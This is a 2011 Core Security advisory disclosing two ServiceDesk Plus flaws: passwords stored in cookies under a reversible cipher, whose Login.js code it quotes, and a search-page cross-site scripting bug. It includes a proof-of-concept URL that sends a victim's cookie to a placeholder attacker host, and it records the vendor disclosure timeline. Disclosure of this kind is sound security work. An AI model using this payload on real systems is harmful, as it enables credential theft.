Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
Multiples Vulnerabilities in ManageEngine ServiceDesk Plus
1. *Advisory Information*
Title: Multiples Vulnerabilities in ManageEngine ServiceDesk Plus
Advisory ID: CORE-2011-0506
Advisory URL:
http://www.coresecurity.com/content/multiples-vulnerabilities-manageengi
ne-sdp
Date published: 2011-09-14
Date of last update: 2011-09-14
Vendors contacted: ManageEngine
Release mode: User release
2. *Vulnerability Information*
Class: Authentication issues [CWE-287], Cross site scripting [CWE-79]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-1509, CVE-2011-1510
3. *Vulnerability Description*
ManageEngine ServiceDesk Plus is a complete web based and ITIL ready
service desk software with integrated asset management developed by
ManageEngine, the Enterprise IT Management Software division of Zoho
Corporation [1].
The authentication process of ServiceDesk Plus obfuscates user passwords
using a trivial and symmetrical algorithm in Javascript code with no
secret. Given that user passwords are locally stored in user cookies and
having the Javascript code to encrypt and decrypt passwords in a .js
file , the authentication process of ServiceDesk Plus can be bypassed
allowing an attacker to get usernames+passwords of registered users.
Additionally, a cross site scripting vulnerability related to search
functions was found.
4. *Vulnerable packages*
. ManageEngine ServiceDesk Plus 8.0.0 Professional edition.
. Older versions are probably affected too, but they were not checked.
5. *Non-vulnerable packages*
. Contact vendor for further information.
6. *Vendor Information, Solutions and Workarounds*
Regarding the vulnerability issue in 'SearchSolution' page
[CVE-2011-1510], the SDP team has identified this vulnerability
[2011-05-16] and it was fixed in SDP 8012, June 2011. ManageEngine did
not provide technical information, workaround nor a clear timeline for
fixes regarding [CVE-2011-1509]. Please, contact vendor for further
information and patches.
7. *Credits*
This vulnerability was discovered and researched by Matias Blanco from
Core Security Technologies.
8. *Technical Description / Proof of Concept Code*
8.1. *Authentication Weakness*
[CVE-2011-1509] User passwords are pseudo encrypted and locally stored
in user cookies. This encryption is symmetrical using Caesar Cipher with
no salt or secret, having the Javascript code encrypt and decrypt
passwords in 'Login.js' file.
/-----
/* $Id: Login.js,v 1.47 2010/10/05 15:47:53 vidhyadurai Exp $ */
...
12
13 function encryptPassword(textPassword)
14 {
15 var num_out = "";
16 var str_in = escape(textPassword);
17 for(i = 0; i < str_in.length; i++)
18 {
19 num_out += str_in.charCodeAt(i) - 23;
20 }
21 return num_out;
22 }
23
-----/
/-----
/* $Id: Login.js,v 1.47 2010/10/05 15:47:53 vidhyadurai Exp $ */
...
23
24 function decryptPassword(encPassword)
25 {
26 var str_out = "";
27 var num_out = encPassword;
28 for(i = 0; i < num_out.length; i += 2)
29 {
30 num_in = parseInt(num_out.substr(i,[2])) + 23;
31 num_in = unescape('%' + num_in.toString(16));// No I18N
32 str_out += num_in;
33 }
34 var textPassword = unescape(str_out);
35 return textPassword ;
36 }
37
-----/
So, if the attacker succeeded in trying to steal the cookie, he can
easily decrypt it and get the original password. Given that the username
is also stored in plaintext in the cookie, this can lead to
impersonation and identity theft.
8.2. *Cross-Site Scripting*
[CVE-2011-1510] There is a lack of sanitization in the 'searchText'
parameter located in the 'SolutionSearch.do' page. An external attacker
can obtain the password of an authenticated ManageEngine user by making
this request:
/-----
https://[vulnerable_site]/SolutionSearch.do?searchText=';var
el=document.createElement('img');el.src='http://[malicious_site]?pass='%
2Bdocument.cookie;document.documentElement.appendChild(el);'
-----/
This request performs an HTTP request to a webserver controlled by the
attacker, 'http://[malicious_site]', sending the cookie that includes
the predictable password.
9. *Report Timeline*
. 2011-05-12:
Initial notification to the vendor. Publication date set to June 7th, 2011.
. 2011-05-13:
The Service Desk team asks Core for a technical description of the
vulnerability.
. 2011-05-13:
Technical details sent to Service Desk team.
. 2011-05-16:
The Service Desk team notifies they are analyzing the [CVE-2011-1509]
issue and it will take them some time to fix it. The issue
[CVE-2011-1510] was identified and it will be fixed in SDP 8012, which
is expected by the end of May 2011.
. 2011-05-23:
Core requests to clarify whether the problems will be released
altogether or in two release cycles.
. 2011-05-27:
The Service Desk team notifies the issue [CVE-2011-1510] will be fixed
in the upcoming hotfix 8012, which is currently under validation phase
and is expected to get released by next week. Regarding the encryption
issue [CVE-2011-1509], the Service Desk team notifies they will have to
work on that and will not be able to provide a fix by June 7th 2011.
. 2011-06-02:
Core states that neither the progress status nor the release date for
the fix of [CVE-2011-1509] have been notified. Core also claims that the
advisory publication was rescheduled to Jun 21st, and requests a clear
timeline.
. 2011-06-07:
The Service Desk team notifies that they have not been working on this
issue. Once the next product release is over they will get started on
the analysis.
. 2011-06-07:
First release date missed.
. 2011-06-21:
Second release date missed.
. 2011-06-23:
Core notifies that the vulnerability was reported 5 weeks ago
[2011-05-12], 2 release dates were already missed, and requests an
update on the status as soon as possible in order to assess the situation.
. 2011-07-08:
Core notifies that is not possible to keep the process coordinated
without the requested information and reschedules the advisory to be
published on July 19th as 'User Release'.
. 2011-07-08:
The Service Desk team notifies that they have started analyzing
[CVE-2011-1509] and working on various solutions to get this fixed. The
vendor also notifies that they will try to roll the patches on the 8.1
release, which is expected in 2 months' time from now.
. 2011-07-18:
Core considers bad practice to postpone the patch release 2 months until
a new version of the product is available (since it may suffer
engineering delays that have nothing to do with the reported security
issue itself). As a result, Core offers to reschedule the advisory
publication to Aug 9th, providing additional time to the vendor for
developing patches and/or the appropriate mitigation actions, until the
version 8.1 comes to light.
. 2011-07-19:
Third release date missed.
. 2011-08-08:
Core requests a status update and notifies the advisory is currently
scheduled to be published tomorrow, Aug 9th. Core also requests to
clarify if the vendor will release fixes for previous vulnerable
versions of ManageEngine.
. 2011-08-09:
Manage Engine team notifies they have not fixed the issue yet and
customers will have to upgrade to the latest version to get a fixed
version of the product.
. 2011-08-09:
Fourth release date missed.
. 2011-08-12:
Core notifies that the release date was missed and requests to clarify a
new estimated date for disclosure. Core also requests additional
technical information regarding the fix and how Manage Engine team is
going to resolve the weakness in the authentication process. Core also
requests to clarify if customers of old versions will have to pay for
the latest (patched) version or they will be able to download free patches.
. 2011-08-16:
Manage Engine team notifies that there could be a delay of about a month
for a release candidate; technical details will be released once they
decide on the final implementation. Vendor also notifies that the
upgrade from a earlier version to a new version is free. A patch will be
available in the site for the upgrades.
. 2011-08-18:
Core notifies that given:
1. this flaw was reported 3 months ago [2011-05-12],
2. 4th release dates were already missed,
3. SDP is postponing the release of patch until a new version of the
product is available,
4. and the lack of technical information about how and when SDP will
patch this flaw;
Core has decided to re-schedule the advisory to Sep 13th and this
should be considered as a final date.
. 2011-09-14:
CORE-2011-0506 is published.
10. *References*
[1] ManageEngine ServiceDesk Plus
http://www.manageengine.com/products/service-desk.
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and prove real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.a
sc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iEYEARECAAYFAk5xFlAACgkQyNibggitWa3M3gCfbvJRKHSk0XPCxsLrzdxclTQF
pF0An3AcwrzHJoAVu/lbrI8gaSw8QUwJ
=dq5o
-----END PGP SIGNATURE-----